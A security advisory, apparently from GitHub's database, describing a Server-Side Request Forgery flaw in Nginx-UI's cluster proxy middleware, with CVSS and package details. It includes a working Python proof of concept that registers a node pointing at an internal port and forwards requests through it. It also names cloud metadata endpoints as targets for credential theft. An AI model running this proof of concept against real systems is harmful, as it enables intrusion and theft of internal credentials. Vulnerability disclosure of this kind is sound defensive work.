Nginx-UI has Server-Side Request Forgery (SSRF) via Cluster Proxy Middleware that Allows Access to Internal Services

Description

Summary

An authenticated user can perform Server-Side Request Forgery (SSRF) by creating a cluster node pointing to an arbitrary internal URL and then sending API requests with the X-Node-ID header. The Proxy middleware forwards these requests to the attacker-specified internal address, bypassing network segmentation and enabling access to services bound to localhost or internal networks.

Details

The nginx-ui Proxy middleware (internal/middleware/proxy.go) intercepts API requests containing an X-Node-ID header and forwards them to the URL of the corresponding cluster node. An attacker can:

  1. Read the node_secret from GET /api/settings (accessible to any authenticated user)
  2. Create a cluster node via POST /api/nodes pointing to any internal URL:
{
    "name": "ssrf_node",
    "url": "http://127.0.0.1:51820",
    "token": "<node_secret>",
    "enabled": true
}
  1. Send any API request with the X-Node-ID header set to the created node's ID:
GET /api/settings HTTP/1.1
Authorization: <token>
X-Node-ID: 1
  1. The Proxy middleware forwards this request to http://127.0.0.1:51820/api/settings, making a server-side request to the internal address.

Vulnerable code path:
- internal/middleware/proxy.goProxy(): no validation of the node URL; allows 127.0.0.1, localhost, internal IPs, cloud metadata endpoints, etc.

The node URL is not restricted to external addresses or validated against an allowlist. Combined with the njs Code Injection vulnerability (separate advisory), this SSRF is used to trigger the njs payload executing on an internal-only nginx port, completing the RCE chain.

PoC

import requests

BASE = "http://TARGET:9000"
TOKEN = "<authenticated_jwt_token>"
HDR = {"Authorization": TOKEN}

# Step 1: Get node_secret
settings = requests.get(f"{BASE}/api/settings", headers=HDR).json()
node_secret = settings["node"]["secret"]

# Step 2: Create SSRF node pointing to internal service
resp = requests.post(f"{BASE}/api/nodes", headers=HDR, json={
    "name": "ssrf",
    "url": "http://127.0.0.1:51820",  # internal-only port
    "token": node_secret,
    "enabled": True,
})
node_id = resp.json()["id"]

# Step 3: SSRF — request is forwarded to http://127.0.0.1:51820/api/settings
resp = requests.get(
    f"{BASE}/api/settings",
    headers={**HDR, "X-Node-ID": str(node_id)},
)
print(resp.status_code, resp.text[:200])
# Response comes from the INTERNAL service, not nginx-ui

This can also target cloud metadata endpoints (e.g., http://169.254.169.254/latest/meta-data/) or any other internal service.

Impact

An authenticated attacker can:

  • Access internal services bound to localhost or private networks that are not intended to be externally reachable
  • Access cloud metadata endpoints (AWS/GCP/Azure instance metadata) to steal IAM credentials
  • Port-scan internal networks by creating nodes pointing to different internal IPs/ports
  • Trigger internal-only njs endpoints to escalate privileges (as demonstrated in the companion RCE advisory)
  • Bypass network segmentation and firewalls that only restrict inbound traffic

Basic information

Type
reviewed
Severity
high
Advisory on GitHub
Open advisory ↗
Repository advisory
Open repository advisory ↗
Source code
Browse source ↗
Published (advisory)
2026-04-29 20:54:54 UTC
Updated
2026-05-13 16:31:43 UTC
GitHub reviewed
2026-04-29 20:54:54 UTC
NVD published
2026-05-12

EPSS Score

Score Percentile
0.03% 8.93%

CVSS Scores

Base score Version Severity Vector
8.5 3.1
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N Click to expand
Attack vector (AV:N)
Could be attacked over the internet or any normal routed network—not just someone sitting at the machine.
Attack complexity (AC:L)
Once they can reach the bug, pulling it off is straightforward—no weird race conditions or rare setup.
Privileges required (PR:L)
A normal user session is enough; they don’t have to be admin.
User interaction (UI:N)
Nobody has to click “OK” or open a trap file; it can work without a victim helping.
Scope (S:C)
Breaking this can reach past the original component and bite other resources—bigger blast radius.
Confidentiality (C:H)
Serious risk that confidential data gets exposed in a big way.
Integrity (I:L)
Attackers could change some data, but it’s limited—not everything goes.
Availability (A:N)
Service keeps running; no real outage angle.

Identifiers

CWEs

CWE id Name
CWE-918 Server-Side Request Forgery (SSRF)

Credits

  • miffyaa (reporter)

Affected packages (1)

Vulnerable version ranges and first patched releases as published by GitHub.

Ecosystem Package Vulnerable range First patched Vulnerable functions
go github.com/0xJacky/Nginx-UI <= 2.3.4

References

cvelogic Threat Intelligence